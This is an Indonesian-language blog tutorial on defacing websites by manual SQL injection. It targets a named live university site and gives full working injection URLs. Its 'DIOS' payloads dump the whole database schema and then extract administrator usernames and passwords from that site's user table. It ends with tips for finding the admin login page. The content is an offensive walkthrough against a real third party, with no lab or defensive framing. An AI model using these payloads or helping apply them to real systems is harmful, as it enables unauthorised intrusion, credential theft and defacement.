Deface Metode SQL Injection Manual with Dios

Assalamualaikum w.r w.b
Bertemu lagi dengan saya
Kali ini saya akan memberikan tutorial SQL Injection Manual

Oke.... disimak ya hehe

Bahan - Bahan
1. Internet cuy yakali kaga pake internet
2. Dork *kalian bisa cek dork disini > Dork SQL injection
3. Web yg vuln sql injection
    *disini saya ada live target : http://dme.im.ufrj.br/visualizarNoticia.php?id=25
- Sekarang kita tambahkan ' (single quote)
 jadinya seperti ini : http://dme.im.ufrj.br/visualizarNoticia.php?id=25'
- Dan disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- Lalu kita disini melakukan perintah +order+by+1--+
- Contoh : http://dme.im.ufrj.br/visualizarNoticia.php?id=25+order+by+1--+

- Lakukan order by hingga menemukan error lagi seperti ini saya menemukan error di angka 4.
- Berarti kita hanya ambil sampai 3 saja karena error nya di 4.
- Selanjutnya kita melakukan perintah +union+select+ dan menambahkan - sebelum angka
- Jadinya seperti ini : http://dme.im.ufrj.br/visualizarNoticia.php?id=-25+union+select+1,2,3--+
- Dan disini muncul angka togel yaitu 1,2 dan 3.
- Agar tidak lama untuk mencari database, table dan column kita menggunakan dios saja
- Masukan dios ini di angka togel
 Dios :
 /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
- Dan disini langsung keluar database table dan column nya.
 Note : Bila kalian tidak tahu mana database, table dan mana column saya akan memberitahu kalian, jadi yang paling kiri itu database, yang tengah namanya table, dan yang  paling kanan itu namanya column
- Selanjutnya kita tinggal ambil user / password admin.
- Dengan cara memasukan dios berikut
Dios :
 (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x)
- Bisa dibilang seperti ini :
 http://dme.im.ufrj.br/visualizarNoticia.php?id=-25+union+select+1,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(usuario)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,strLogin,0x203a3a20,strSenha))))x),3--+
 *kalian harus sesuaikan nama table dan colum nya ya..

- Dan sekarang kita sudah mendapatkan user dan password admin nya.
- Sekarang tinggal kalian cari saja halaman admin nya biasanya di
 *  -/admin
     -/administrator
     -/login.php
     -/admin.php
- Jika belum ketemu juga kalian bisa download dirbuster Disini, atau memakai admin finder online.

Oke mungkin cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial...

0 Response to "Deface Metode SQL Injection Manual with Dios"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel